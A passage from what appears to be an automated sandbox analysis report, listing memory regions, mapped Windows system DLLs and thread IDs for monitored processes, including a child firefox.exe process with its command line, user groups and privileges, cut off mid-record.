Region: id = 1606 start_va = 0x1dc0000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 1607 start_va = 0x1e00000 end_va = 0x2201fff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1608 start_va = 0x2340000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1609 start_va = 
0x23e0000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1610 start_va = 0x2450000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1611 start_va = 0x63890000 end_va = 0x6391bfff entry_point = 0x63890000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1612 start_va = 0x63920000 end_va = 0x63a0afff entry_point = 0x63920000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1613 start_va = 0x6e040000 end_va = 0x6e075fff entry_point = 0x6e040000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1614 start_va = 0x6f270000 end_va = 0x6f284fff entry_point = 0x6f270000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1615 start_va = 0x6f290000 end_va = 0x6f2a3fff entry_point = 0x6f290000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1616 start_va = 0x6f3b0000 end_va = 0x6f3b2fff entry_point = 0x6f3b0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 1617 start_va = 0x6f650000 end_va = 0x6f65efff entry_point = 0x6f650000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1618 start_va = 0x6f860000 end_va = 0x6f869fff entry_point = 0x6f860000 region_type = 
mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1619 start_va = 0x6f870000 end_va = 0x6f887fff entry_point = 0x6f870000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1620 start_va = 0x6f890000 end_va = 0x6f925fff entry_point = 0x6f890000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1621 start_va = 0x6fa60000 end_va = 0x6fabbfff entry_point = 0x6fa60000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1622 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1623 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1624 start_va = 0x73310000 end_va = 0x73340fff entry_point = 0x73310000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1625 start_va = 0x73350000 end_va = 0x7338ffff entry_point = 0x73350000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1626 start_va = 0x733a0000 end_va = 0x733a5fff entry_point = 0x733a0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: 
"c:\\windows\\system32\\nrpsrv.dll") Region: id = 1627 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1628 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1629 start_va = 0x733e0000 end_va = 0x733e7fff entry_point = 0x733e0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1630 start_va = 0x73730000 end_va = 0x73736fff entry_point = 0x73730000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1631 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1632 start_va = 0x73770000 end_va = 0x737e9fff entry_point = 0x73770000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1633 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1634 start_va = 0x73960000 end_va = 0x7396efff entry_point = 0x73960000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1635 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" 
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1636 start_va = 0x73bf0000 end_va = 0x73c28fff entry_point = 0x73bf0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1637 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1638 start_va = 0x744e0000 end_va = 0x745ebfff entry_point = 0x744e0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1639 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1640 start_va = 0x74600000 end_va = 0x74675fff entry_point = 0x74600000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1641 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1642 start_va = 0x74730000 end_va = 0x74745fff entry_point = 0x74730000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1643 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1644 start_va = 0x74840000 end_va = 
0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1645 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1646 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1647 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1648 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1649 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1650 start_va = 0x74d30000 end_va = 0x74d71fff entry_point = 0x74d30000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1651 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1652 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: 
"c:\\windows\\system32\\sspicli.dll") Region: id = 1653 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1654 start_va = 0x75060000 end_va = 0x75088fff entry_point = 0x75060000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1655 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1656 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1657 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1658 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1659 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1660 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1661 start_va = 0x75340000 end_va = 0x7536cfff entry_point = 0x75340000 region_type = mapped_file 
name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1662 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1663 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1664 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1665 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1666 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1667 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1668 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1669 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1670 start_va = 0x766f0000 end_va = 0x7684bfff 
entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1671 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1672 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1673 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1674 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1675 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1676 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1677 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1678 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 
1679 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1680 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1681 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1682 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1683 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1684 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1685 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 1686 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1687 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1688 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1689 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffaa000" filename = "" Region: id = 1690 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1691 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1692 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1693 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1694 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1696 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1697 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1698 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1699 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1700 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1701 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1702 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = 
"" Region: id = 1703 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1704 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1705 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1706 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1707 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1708 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 103 os_tid = 0xc6c Thread: id = 104 os_tid = 0xc68 Thread: id = 105 os_tid = 0xb20 Thread: id = 106 os_tid = 0xa40 Thread: id = 107 os_tid = 0x9e0 Thread: id = 108 os_tid = 0x514 Thread: id = 109 os_tid = 0x6a4 Thread: id = 110 os_tid = 0xcc Thread: id = 111 os_tid = 0x454 Thread: id = 112 os_tid = 0x448 Thread: id = 113 os_tid = 0x3b8 Thread: id = 114 os_tid = 0x3b0 Thread: id = 115 os_tid = 0x3a0 Thread: id = 116 os_tid = 0x354 Thread: id = 117 os_tid = 0x350 Thread: id = 118 os_tid = 0x34c Thread: id = 119 os_tid = 0x2fc Thread: id = 120 os_tid = 0x2f8 Thread: id = 121 os_tid = 0x2ec Thread: id = 122 os_tid = 0x2e0 Thread: id = 123 os_tid = 0x2d4 Thread: id = 124 os_tid = 0x2cc Thread: id = 130 os_tid = 0xd08 Process: id = "11" image_name = "firefox.exe" filename = "c:\\program files\\mozilla firefox\\firefox.exe" page_root = "0x7f1e6420" os_pid = "0xce4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xbd4" cmd_line = "\"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\"" cur_dir = 
"C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1797 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1798 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1799 start_va = 0x40000 end_va = 0x42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1800 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1801 start_va = 0x1f0000 end_va = 0xbb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1802 start_va = 0xbc0000 end_va = 0xcc9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1803 start_va = 0x1240000 end_va = 0x1283fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 1804 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1805 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1806 
start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1807 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1808 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1809 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1810 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1811 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1812 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1813 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1814 start_va = 0x72000000 end_va = 0x720bdfff entry_point = 0x72000000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 1815 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1816 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type 
= mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1817 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1818 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1819 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1820 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1821 start_va = 0xcd0000 end_va = 0xd97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 1822 start_va = 0xdd0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1823 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1824 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1825 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1826 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" 
Region: id = 1827 start_va = 0xe30000 end_va = 0xf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 1828 start_va = 0xf40000 end_va = 0x107bfff entry_point = 0xf40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1829 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1830 start_va = 0x1290000 end_va = 0x1e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 1831 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1832 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1833 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1834 start_va = 0xd0000 end_va = 0xd3fff entry_point = 